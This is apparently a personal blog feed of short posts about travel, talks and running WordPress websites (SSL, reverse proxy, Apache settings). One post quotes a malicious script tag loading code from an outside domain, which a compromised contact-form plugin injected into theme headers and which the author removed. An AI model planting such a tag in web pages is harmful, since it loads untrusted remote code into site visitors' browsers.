Brisbane and back.
Faculty meeting and talk.
Lots happening. But sometimes I think I like it that way.
🙂
Brisbane and back.
Faculty meeting and talk.
Lots happening. But sometimes I think I like it that way.
🙂
Off to the next accreditation visit
Which is not what you want to be remote trouble shooting, just before boarding, from the airport in the lead up to a 12 hour flight, with no sleep overnight in the lead up to all of this
No idea why the websites went down, but fixed anyway now. Or you wouldn’t be reading this .
Finally – now working with SSL.
So you can see this site via an encrypted link:
HTTPS://veltman.org
as well as the unencrypted old school link
HTTP://veltman.org
I think it was worth the effort…
Got SSL working now on the web server, but not for the proxy yet..
Wow…
Several hours later, and this website is now hosted on an Ubuntu server.
Technically speaking, no mac required. More importantly, we now have a reverse proxy server working!
Looks like a couple of my websites fell foul of the hacking of the fast secure contact form. Really annoying that I had to undo this.
References on both painscience.com.au and also veltman.org to the script that had inserted this into the headers of all my themes:
<script src='https://json.stringengines.com/pson.js?n=1' type='text/javascript'></script>
I think that what appears to have happened here is that the fast secure contact form was bought by a malicious programmer who then put an update that inserted this malware. Its since been pulled by the wordpress site from the list of plugins.
The original author did do one final update on his website that I’ve downloaded, so I’ll probably need to install that on my servers as it was a useful plugin.
Live and learn.
Just for the record, this needs to go into the .htaccess file in the /etc/apache2 folder.
php_value upload_max_filesize 64M php_value post_max_size 64M php_value max_execution_time 300 php_value max_input_time 300
Back in Perth
The PDF of this talk can be found here
Let me know if you have any questions on all of this.
Michael